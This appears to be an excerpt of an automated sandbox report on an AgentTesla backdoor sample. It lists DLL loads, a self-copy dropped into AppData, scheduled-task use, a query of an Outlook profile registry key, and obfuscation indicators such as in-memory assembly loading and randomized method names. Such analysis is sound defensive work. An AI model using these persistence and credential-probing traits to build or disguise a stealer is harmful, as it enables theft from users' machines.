Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, FormFibonacci.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe, FormFibonacci.cs	.Net Code: InitializeComponent
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	.Net Code: GtYWXql1v9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	.Net Code: GtYWXql1v9 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_04EEB698 push eax; mov dword ptr [esp], ecx	0_2_04EEB69C
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 0_2_04EEC170 push eax; ret	0_2_04EEC1A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Code function: 9_2_00E19C30 push esp; retf 0106h	9_2_00E19D55
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076079B0 push 380761CBh; retf	11_2_076079B5
Source: C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe	Code function: 11_2_076079B6 push esp; retf	11_2_076079B9

Source: SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Static PE information: section name: .text entropy: 7.9573634089083
Source: xRAvleeiuDbJ.exe.0.dr	Static PE information: section name: .text entropy: 7.9573634089083

Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, rfySD1crvvOadsRALl.cs	High entropy of concatenated method names: 'YdUF4DdVpO', 'WCsFNnAHEF', 'ToString', 'jRnFvn3QPP', 'ap5FrKkB4t', 'rjoFV30OVj', 'nXgFfpJ58K', 'cLPFy3A6ka', 'QRmFGmFL56', 'e64FOsBmOH'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	High entropy of concatenated method names: 'CFjH3fW2Je', 'wIZHvO9gBg', 'nxkHrZM2UM', 'QjRHVI9N13', 'e4sHfCiO48', 'Y3rHyBgj9a', 'mCHHGwN9Gg', 'BUbHOfOTmY', 'dwZH1WFMnJ', 'FA9H4R0Mgr'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, IPjPpBkqpwQu1NDSB2X.cs	High entropy of concatenated method names: 'LG1YpCD0Hg', 'EMYY6QOAAD', 'OLMYXlwbZe', 'GurYR2XLJj', 'U75YJ6OlGG', 'bGLY28sX6N', 'kN1Yx8FDqu', 'pCkYTSHR8c', 'eUdYbfSoGJ', 'vFIYAmb3ab'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, n62hCBeB5FbBbgQBC9.cs	High entropy of concatenated method names: 'WCpj0Scsad', 'CyijDeF9dY', 'yAejevdi66', 'K0kj9ErcVx', 'Oe2jawgCcL', 'JLpjgQ8tWu', 'yEVj7OOeNf', 'm6wjdQ2dFk', 'igVjSWWnUy', 'fgYjUq71Ad'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, OlEe1ZhwO9D7Faf9iE.cs	High entropy of concatenated method names: 'BFoLTcuFtY', 'm0eLb5F1xh', 'iX8LB6ynFY', 'yygLaVmeoD', 'bI1L7OAXT4', 'JjoLdJE3Oo', 'oFELUQuu5y', 'zfULMxHQRA', 'GBoL0k3oHw', 'AUkLtR1OPT'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, LbBRuVw0xhYW3WDCU3.cs	High entropy of concatenated method names: 'GamFQCS6p5', 'nUcFCTplmF', 'x0R5qNLWqI', 'wCR5kQ30fK', 'wvQFtDdJUF', 'WW1FD4B1Ce', 'RhNFhGpWl3', 'K0hFerjfq2', 'h5uF9XSP4d', 'cptFI2uuBm'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, rpU1JwkHHBplcjc7HZP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uqZseuGJt4', 'oWBs9PbAZ1', 'acysIrAxW3', 'lMhscDVNR2', 'rWGsKlCJrm', 'iCLswa722p', 'DROsPnsOi5'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, gMZDeOAcbgMBx7t1Ut.cs	High entropy of concatenated method names: 'ABwfJZ9TCY', 'qV2fxdTrUf', 'wPbVgadXqn', 'koeV7eNrr5', 'y9BVdXovGF', 'FZdVSQ2m5f', 'vjrVUE4dWM', 'NdNVMdxOfR', 'UDBVn4nb9i', 'iuPV0POeJL'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, qNp452Q2giNnYLrvXI.cs	High entropy of concatenated method names: 'E105veDuI7', 'TFJ5rR5wA9', 'Sue5VrtdBN', 'QTZ5fB8WJe', 'GmW5yHUnuH', 'JXr5GoxsfZ', 'ahi5OdJIQq', 'Y1e519QkyP', 'jjA54oBlN2', 'o8U5Noxii9'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, Kv4heBn59g6pZLvVJg.cs	High entropy of concatenated method names: 'fqyGpY6AeZ', 'nWCG645msp', 'IPcGXdlurI', 'MCoGRRfx3L', 'HHoGJluGIb', 'tTlG2v4S3o', 'UHxGxxbeMj', 'DXEGT77sAL', 'lWSGbvpJuo', 'lUgGA1JoxH'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, lkhvI9W1EeInTbFxDU.cs	High entropy of concatenated method names: 'nuvkGuQMSD', 'txTkOVdQxu', 'gn9k44u89A', 'AFrkNwrMZD', 'It1kjUtoFg', 'zhBkihqABw', 'Y1sLcN27mqVnd8lTOS', 'L3yxunwpcovw0H6Qka', 'FyUkkg8MML', 'uAjkHRJCek'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, T0h08cUGERMERMSdy8.cs	High entropy of concatenated method names: 'bKLGvkh4gh', 'TRkGV6dNf0', 'LMQGyysUIA', 'jg4yC6EcPk', 'bGXyz3aU3o', 'R9FGqX1HDd', 'SVuGk8VhF8', 'PQpG8vDswE', 'WPLGHnH8WT', 'RNFGWK1DuX'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, ScvsqwrNEMMBg7ip1h.cs	High entropy of concatenated method names: 'Dispose', 'NqtkmoHiMb', 'anK8abExeL', 'MnwuuYk6Ux', 'DFNkCp4522', 'HiNkznYLrv', 'ProcessDialogKey', 'zIl8qr8Fht', 'qUU8klBxtU', 'Ess88BbSPf'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, TL86bakkh8qQKecxcAw.cs	High entropy of concatenated method names: 'ToString', 'F3xsHvb3m1', 'lYcsWGnfRp', 'PKKs3H8WK8', 'ShusvGlmr6', 'fFrsr27W1T', 'lCVsViuLv5', 'bNFsflq6or', 'db0hSWA4oJlDWEh5ack', 'sLLLhAAilFl0Ee5J7v0'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, GbSPf3CNBW5xc3kN66.cs	High entropy of concatenated method names: 'KqTYkGoyHS', 'wH4YHeSq0T', 'sbEYWESZyG', 'F6EYv6FWjE', 'kJJYrsUZBQ', 'C4KYflCnLd', 'e3rYyXfPQE', 'wkF5P89MWO', 'NfS5QJbOBj', 'zVN5muKpOR'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, tBS8UQIygTEgLmsOJb.cs	High entropy of concatenated method names: 'ToString', 'XyFitq4iGV', 'HhqiaJMu4D', 'MvtigxSmuc', 'hj5i73506T', 'YZoidjGZvN', 'XM5iSbxIKJ', 'OpoiU92Cek', 'yoDiM0XiUM', 'GS7inK2hhP'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, i0dhnrbn94u89ARFrw.cs	High entropy of concatenated method names: 'LOwVRSkFWm', 'KfIV2pf3u5', 'mabVTyU75u', 'P8xVbG4bRo', 'KhgVjHAVs6', 'm7cViqkp9a', 'H12VFIqGSL', 'XMAV53Jhc8', 'RHaVYZfWTY', 'T9qVsSdKCD'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, FeEN6L80roZrbPEPAG.cs	High entropy of concatenated method names: 'H7mXBO6pn', 'gIsRJIYHY', 's1R2VuKRn', 'kn1xfRugL', 'yKDbp9FFb', 'cPkAKe5iJ', 'sV8keq1C03f0RIT6V1', 'qviIPNy1uXZcSATZtf', 'EJW5ropiY', 'QVusmchmf'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, wr8FhtmFUUlBxtUbss.cs	High entropy of concatenated method names: 'Yrr5BUbZ9r', 'Crd5aJjO3I', 'y1C5gH21NB', 'EIF57wrcQq', 'Gyt5ewQY6R', 'Ss65dHaoAp', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, fuQMSDTExTVdQxuWmx.cs	High entropy of concatenated method names: 'GdvrevwMJP', 'xg5r9IuFpM', 'KxKrIYKUpr', 'MNlrc1BGHQ', 'EJTrKgI4ZJ', 'P9frwVhsw5', 'kjxrPUqqA7', 'LUTrQ6K6ti', 'Il7rmTKDqR', 'gxprC3uOVb'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, wFgXhBBhqABw7ofaB4.cs	High entropy of concatenated method names: 'Syjy3fIvuh', 'GRayrxxoH3', 'IRhyfwAIjy', 'FWRyGMq1Q7', 'qVayONTZOL', 'ckdfKO83a3', 'y1Mfwj9FrR', 'rEvfPijp2n', 'PRmfQoNRET', 'oqrfmytAHL'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.3b84700.3.raw.unpack, qJH2QNzoQPomgCg9yF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l1NYLUc88O', 'R2PYjOpswk', 'u8TYiMTGf5', 'WDNYFoMZoh', 'Q4KY5RJ8j6', 'DffYY0V8I9', 'EUsYscLopu'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, rfySD1crvvOadsRALl.cs	High entropy of concatenated method names: 'YdUF4DdVpO', 'WCsFNnAHEF', 'ToString', 'jRnFvn3QPP', 'ap5FrKkB4t', 'rjoFV30OVj', 'nXgFfpJ58K', 'cLPFy3A6ka', 'QRmFGmFL56', 'e64FOsBmOH'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Q8JnI8OnJ7YHJb50np.cs	High entropy of concatenated method names: 'CFjH3fW2Je', 'wIZHvO9gBg', 'nxkHrZM2UM', 'QjRHVI9N13', 'e4sHfCiO48', 'Y3rHyBgj9a', 'mCHHGwN9Gg', 'BUbHOfOTmY', 'dwZH1WFMnJ', 'FA9H4R0Mgr'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, IPjPpBkqpwQu1NDSB2X.cs	High entropy of concatenated method names: 'LG1YpCD0Hg', 'EMYY6QOAAD', 'OLMYXlwbZe', 'GurYR2XLJj', 'U75YJ6OlGG', 'bGLY28sX6N', 'kN1Yx8FDqu', 'pCkYTSHR8c', 'eUdYbfSoGJ', 'vFIYAmb3ab'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, n62hCBeB5FbBbgQBC9.cs	High entropy of concatenated method names: 'WCpj0Scsad', 'CyijDeF9dY', 'yAejevdi66', 'K0kj9ErcVx', 'Oe2jawgCcL', 'JLpjgQ8tWu', 'yEVj7OOeNf', 'm6wjdQ2dFk', 'igVjSWWnUy', 'fgYjUq71Ad'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, OlEe1ZhwO9D7Faf9iE.cs	High entropy of concatenated method names: 'BFoLTcuFtY', 'm0eLb5F1xh', 'iX8LB6ynFY', 'yygLaVmeoD', 'bI1L7OAXT4', 'JjoLdJE3Oo', 'oFELUQuu5y', 'zfULMxHQRA', 'GBoL0k3oHw', 'AUkLtR1OPT'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, LbBRuVw0xhYW3WDCU3.cs	High entropy of concatenated method names: 'GamFQCS6p5', 'nUcFCTplmF', 'x0R5qNLWqI', 'wCR5kQ30fK', 'wvQFtDdJUF', 'WW1FD4B1Ce', 'RhNFhGpWl3', 'K0hFerjfq2', 'h5uF9XSP4d', 'cptFI2uuBm'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, rpU1JwkHHBplcjc7HZP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uqZseuGJt4', 'oWBs9PbAZ1', 'acysIrAxW3', 'lMhscDVNR2', 'rWGsKlCJrm', 'iCLswa722p', 'DROsPnsOi5'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, gMZDeOAcbgMBx7t1Ut.cs	High entropy of concatenated method names: 'ABwfJZ9TCY', 'qV2fxdTrUf', 'wPbVgadXqn', 'koeV7eNrr5', 'y9BVdXovGF', 'FZdVSQ2m5f', 'vjrVUE4dWM', 'NdNVMdxOfR', 'UDBVn4nb9i', 'iuPV0POeJL'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, qNp452Q2giNnYLrvXI.cs	High entropy of concatenated method names: 'E105veDuI7', 'TFJ5rR5wA9', 'Sue5VrtdBN', 'QTZ5fB8WJe', 'GmW5yHUnuH', 'JXr5GoxsfZ', 'ahi5OdJIQq', 'Y1e519QkyP', 'jjA54oBlN2', 'o8U5Noxii9'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, Kv4heBn59g6pZLvVJg.cs	High entropy of concatenated method names: 'fqyGpY6AeZ', 'nWCG645msp', 'IPcGXdlurI', 'MCoGRRfx3L', 'HHoGJluGIb', 'tTlG2v4S3o', 'UHxGxxbeMj', 'DXEGT77sAL', 'lWSGbvpJuo', 'lUgGA1JoxH'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, lkhvI9W1EeInTbFxDU.cs	High entropy of concatenated method names: 'nuvkGuQMSD', 'txTkOVdQxu', 'gn9k44u89A', 'AFrkNwrMZD', 'It1kjUtoFg', 'zhBkihqABw', 'Y1sLcN27mqVnd8lTOS', 'L3yxunwpcovw0H6Qka', 'FyUkkg8MML', 'uAjkHRJCek'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, T0h08cUGERMERMSdy8.cs	High entropy of concatenated method names: 'bKLGvkh4gh', 'TRkGV6dNf0', 'LMQGyysUIA', 'jg4yC6EcPk', 'bGXyz3aU3o', 'R9FGqX1HDd', 'SVuGk8VhF8', 'PQpG8vDswE', 'WPLGHnH8WT', 'RNFGWK1DuX'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, ScvsqwrNEMMBg7ip1h.cs	High entropy of concatenated method names: 'Dispose', 'NqtkmoHiMb', 'anK8abExeL', 'MnwuuYk6Ux', 'DFNkCp4522', 'HiNkznYLrv', 'ProcessDialogKey', 'zIl8qr8Fht', 'qUU8klBxtU', 'Ess88BbSPf'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, TL86bakkh8qQKecxcAw.cs	High entropy of concatenated method names: 'ToString', 'F3xsHvb3m1', 'lYcsWGnfRp', 'PKKs3H8WK8', 'ShusvGlmr6', 'fFrsr27W1T', 'lCVsViuLv5', 'bNFsflq6or', 'db0hSWA4oJlDWEh5ack', 'sLLLhAAilFl0Ee5J7v0'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, GbSPf3CNBW5xc3kN66.cs	High entropy of concatenated method names: 'KqTYkGoyHS', 'wH4YHeSq0T', 'sbEYWESZyG', 'F6EYv6FWjE', 'kJJYrsUZBQ', 'C4KYflCnLd', 'e3rYyXfPQE', 'wkF5P89MWO', 'NfS5QJbOBj', 'zVN5muKpOR'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, tBS8UQIygTEgLmsOJb.cs	High entropy of concatenated method names: 'ToString', 'XyFitq4iGV', 'HhqiaJMu4D', 'MvtigxSmuc', 'hj5i73506T', 'YZoidjGZvN', 'XM5iSbxIKJ', 'OpoiU92Cek', 'yoDiM0XiUM', 'GS7inK2hhP'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, i0dhnrbn94u89ARFrw.cs	High entropy of concatenated method names: 'LOwVRSkFWm', 'KfIV2pf3u5', 'mabVTyU75u', 'P8xVbG4bRo', 'KhgVjHAVs6', 'm7cViqkp9a', 'H12VFIqGSL', 'XMAV53Jhc8', 'RHaVYZfWTY', 'T9qVsSdKCD'
Source: 0.2.SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.6d10000.5.raw.unpack, FeEN6L80roZrbPEPAG.cs	High entropy of concatenated method names: 'H7mXBO6pn', 'gIsRJIYHY', 's1R2VuKRn', 'kn1xfRugL', 'yKDbp9FFb', 'cPkAKe5iJ', 'sV8keq1C03f0RIT6V1', 'qviIPNy1uXZcSATZtf', 'EJW5ropiY', 'QVusmchmf'
